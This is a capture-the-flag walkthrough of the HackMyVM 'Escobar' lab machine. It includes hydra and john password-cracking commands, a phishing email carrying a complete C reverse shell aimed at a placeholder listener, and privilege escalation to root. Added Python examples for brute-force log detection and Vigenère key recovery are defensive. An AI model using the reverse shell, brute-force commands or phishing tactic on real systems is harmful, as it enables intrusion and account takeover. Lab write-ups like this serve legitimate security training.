Another very interesting VM from HackMyVm; it can be downloaded here.
Scan the ports with nmap.
On port 80 there is a static HTML page. Brute-force the folders and files.
There is a SquirrelMail site, but we cannot log in yet.
After being stuck here for some time, we notice that the VM's boot screen has some hints.
Add "escobar.hmv" to /etc/hosts, and brute-force the subdomains.
gobuster vhost -u http://escobar.hmv -w /apps/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
We find another subdomain; add it to /etc/hosts too.
Opening the new address in a browser, we get the "File Browser" login panel.
We search the internet, find the project on GitHub, and get the default credentials from its documentation page.
Of course, the password is not the default one. We need to brute-force it with the username "admin". Use Burp Suite to capture the POST data of the login panel, send it to Repeater, and click "Send" once. Let's check the POST data and the response.
Now we know that the POST data is in JSON format and that the server's response to a failed login is "Forbidden". Then we use hydra to brute-force. Take care that the special character (the colon inside the JSON) needs to be escaped, because hydra uses colons as field separators (thanks @ch4rm for the help).
hydra -l admin -P /usr/share/wordlists/rockyou.txt management.escobar.hmv http-post-form '/api/login:{"username"\:"^USER^","password"\:"^PASS^","recaptcha"\:""}:Forbidden' -t 64 -f
Soon we get the correct password.
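The hydra run above works because every wrong guess comes back as the same "Forbidden" (HTTP 403) on the same endpoint, which is also what makes it easy to spot from the server side. The following is an added example and not part of the original write-up: it parses a few constructed access-log lines in combined log format and flags any client that piles up too many failed POSTs to /api/login inside a short window. The path and the 403 status come from the page; the log format, the IP addresses, the threshold and the window length are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Combined/common log format: client, identd, user, [timestamp], "request", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log: 10.0.0.9 mistypes once and then logs in normally;
# 10.0.0.5 hammers the endpoint the way a wordlist run would.
SAMPLE_LOG = [
    '10.0.0.9 - - [01/Mar/2022:10:00:00 +0000] "POST /api/login HTTP/1.1" 403 9',
    '10.0.0.9 - - [01/Mar/2022:10:00:03 +0000] "POST /api/login HTTP/1.1" 200 312',
    '10.0.0.5 - - [01/Mar/2022:10:00:10 +0000] "POST /api/login HTTP/1.1" 403 9',
    '10.0.0.5 - - [01/Mar/2022:10:00:10 +0000] "POST /api/login HTTP/1.1" 403 9',
    '10.0.0.5 - - [01/Mar/2022:10:00:11 +0000] "POST /api/login HTTP/1.1" 403 9',
    '10.0.0.5 - - [01/Mar/2022:10:00:11 +0000] "POST /api/login HTTP/1.1" 403 9',
    '10.0.0.5 - - [01/Mar/2022:10:00:12 +0000] "POST /api/login HTTP/1.1" 403 9',
    '10.0.0.5 - - [01/Mar/2022:10:00:12 +0000] "POST /api/login HTTP/1.1" 403 9',
    '10.0.0.5 - - [01/Mar/2022:10:00:13 +0000] "GET /files/ HTTP/1.1" 200 1024',
    'not a log line at all',
]


def parse_line(line):
    """Return a dict for a well-formed line, or None for anything that does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def detect_bruteforce(lines, path="/api/login", fail_status=403,
                      threshold=5, window_seconds=60):
    """Sliding-window count of failed login POSTs per client IP.

    Returns {ip: timestamp of the failure that crossed the threshold}. Only
    failures are counted, so the eventual 200 of a successful guess does not
    reset anything; a 200 arriving right after an alert is itself a strong
    sign that the guessing worked.
    """
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # ip -> timestamps of recent failures
    alerts = {}
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["method"] != "POST" or ev["path"] != path:
            continue
        if ev["status"] != fail_status:
            continue
        q = recent[ev["ip"]]
        q.append(ev["ts"])
        while q and ev["ts"] - q[0] > window:   # forget failures older than the window
            q.popleft()
        if len(q) >= threshold and ev["ip"] not in alerts:
            alerts[ev["ip"]] = ev["ts"]
    return alerts


if __name__ == "__main__":
    for ip, when in detect_bruteforce(SAMPLE_LOG).items():
        print(f"possible password guessing from {ip}, threshold crossed at {when.isoformat()}")
```

On the sample log only 10.0.0.5 is reported, at the fifth failure; the one typo from 10.0.0.9 stays under the threshold. In practice the same logic is what a fail2ban-style jail or a WAF rate limit on the login route implements, and the JSON body format of the request makes no difference to it.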
Now we can log in to File Browser. There are two folders and one file.
In the folder "works" there is a logins.xlsx. The name is interesting, so we download it.
When we try to open it, it asks for a password.
We use john to brute-force the password.
python2 /usr/share/john/office2john.py logins.xlsx > logins.hash
john --wordlist=/usr/share/wordlists/rockyou.txt logins.hash
Now we can open the xlsx file. Inside there are four email accounts, three activated and one deactivated; one more subdomain address, "http://elcorreo.escobar.hmx", which we add to /etc/hosts; and a message that looks like some kind of hint.
Because gonzalo is the webadmin, we try to log in to SquirrelMail with his account, and succeed.
Here comes a trap. The SquirrelMail version is 1.4.23, and Google says it may have an RCE vulnerability. But after several attempts, I failed to get a reverse shell.
Then @ch4rm hinted that maybe I should consider email phishing. After I checked each email's content, I decided to compose an email with the subject "new update release", with the secret code in the email body, and with a reverse shell as an attachment named "update". The email is sent to the other two accounts from the xlsx file.
The reverse shell code is downloaded from the internet and is written in C.
/* credits to http://blog.techorganic.com/2015/01/04/pegasus-hacking-challenge/ */
#include <stdio.h>
#include <unistd.h>
#include <arpa/inet.h>     /* inet_addr(); missing in the downloaded copy, needed for a clean compile */
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>

#define REMOTE_ADDR "XXX.XXX.XXX.XXX"   /* listener IP */
#define REMOTE_PORT XXX                 /* listener port */

int main(int argc, char *argv[])
{
    struct sockaddr_in sa;
    int s;

    /* address of the listener */
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = inet_addr(REMOTE_ADDR);
    sa.sin_port = htons(REMOTE_PORT);

    /* connect back, then point stdin/stdout/stderr at the socket */
    s = socket(AF_INET, SOCK_STREAM, 0);
    connect(s, (struct sockaddr *)&sa, sizeof(sa));
    dup2(s, 0);
    dup2(s, 1);
    dup2(s, 2);

    /* replace this process with a shell attached to the socket */
    execve("/bin/sh", 0, 0);
    return 0;
}
Compile it.
After sending the email and waiting a few seconds, we get a reverse shell as user "carlos". Now we have the user flag.
There are three users in total under /home. After some enumeration, I found that we can su to carlos and gonzalo with the passwords from the xlsx file, and the home folders of both accounts are readable. So the focus is on user pablo, whose home folder is unreadable for now.
If we su to pablo with the password from the xlsx file directly, we get a "no terminal" error.
We need to run the following two commands to set a TERM variable and the terminal size. The number of rows and columns depends on the size of your screen.
export TERM=xterm-256color
stty rows 120 columns 120
Then we run su pablo again, and wow, the screen fills with strange code, like a computer virus infection.
After several seconds, we get this hint screen.
It looks like we need to decrypt the sr* code. The hint says VINEGAR. Let's Google it.
Click the first site (it should be the most popular, because CTF players like it). After some failures, I read the hints again carefully. I think "aaaa-zzzz" means the alphabet set, and "pablo******" means the correct password starts with this string. That narrows down the decryption results. At last, we can pick the right one from more than 20 decrypted passwords.
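To show what the hint screen is really giving away, here is an added example that is not part of the original write-up. It treats "aaaa-zzzz" as a four-letter lowercase Vigenère key space and "pablo******" as a known plaintext prefix (that reading of the hint is an assumption), and it works on a ciphertext constructed here by encrypting a made-up password with a made-up key; the VM's real sr* string is not reproduced. With a known prefix at least as long as the key, every key letter is simply ciphertext letter minus plaintext letter mod 26, so the key falls out directly and no online tool is needed; the brute-force function shows how the candidate list shrinks as the known prefix gets longer.

```python
import string
from itertools import product

ALPHABET = string.ascii_lowercase

# Constructed sample: KEY and PLAINTEXT are made up; CIPHERTEXT = vigenere(PLAINTEXT, KEY).
KEY = "wxyz"
PLAINTEXT = "pablofilebrowser"
CIPHERTEXT = "lxzkkcgkaypnspcq"


def vigenere(text, key, decrypt=False):
    """Classic Vigenère: shift letter i by key[i mod len(key)] (subtract when decrypting).
    Non-letters are copied through and do not consume a key position."""
    shifts = [ord(k) - ord("a") for k in key.lower()]
    if decrypt:
        shifts = [-s for s in shifts]
    out, j = [], 0
    for ch in text:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shifts[j % len(shifts)]) % 26 + base))
            j += 1
        else:
            out.append(ch)
    return "".join(out)


def key_from_known_prefix(ciphertext, known_prefix, key_len):
    """Recover the key directly: key[i] = (C[i] - P[i]) mod 26 for the first key_len letters.
    A prefix shorter than the key leaves positions undetermined, so refuse instead of guessing.
    Assumes the leading key_len characters are letters (true for the constructed sample)."""
    if len(known_prefix) < key_len:
        raise ValueError("known prefix shorter than key length: key not fully determined")
    key = []
    for c, p in zip(ciphertext[:key_len].lower(), known_prefix[:key_len].lower()):
        key.append(ALPHABET[(ord(c) - ord(p)) % 26])
    return "".join(key)


def brute_force_prefix(ciphertext, known_prefix, key_len):
    """Exhaust all 26**key_len keys and keep those whose plaintext starts with known_prefix.
    Only the prefix is decrypted inside the loop; the full plaintext is produced for hits."""
    n = len(known_prefix)
    hits = {}
    for k in product(ALPHABET, repeat=key_len):
        key = "".join(k)
        if vigenere(ciphertext[:n], key, decrypt=True) == known_prefix:
            hits[key] = vigenere(ciphertext, key, decrypt=True)
    return hits


if __name__ == "__main__":
    print("recovered key:", key_from_known_prefix(CIPHERTEXT, "pablo", 4))
    for prefix in ("pab", "pablo"):
        print(f"prefix {prefix!r}: {len(brute_force_prefix(CIPHERTEXT, prefix, 4))} candidate keys")
```

With a three-letter prefix the fourth key position is unconstrained and 26 candidate plaintexts survive; with the full "pablo" prefix the fifth letter re-checks key position 0, and exactly one key remains. That is the general lesson behind the hint: a Vigenère key is only as strong as the secrecy of the plaintext it protects, and a known prefix longer than the key defeats it outright.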
We enter the "real" password, and we are logged in as pablo.
OK, now sudo -l; with these two real passwords we can do anything. Finally, we are root.
Thanks for reading to the end. There is one more clue.
If you tried the SquirrelMail RCE with the PoC code downloaded from the internet, you will fail to send emails.
In fact, this is because the RCE code changes the user's own email address. We need to change it back to the original, correct one.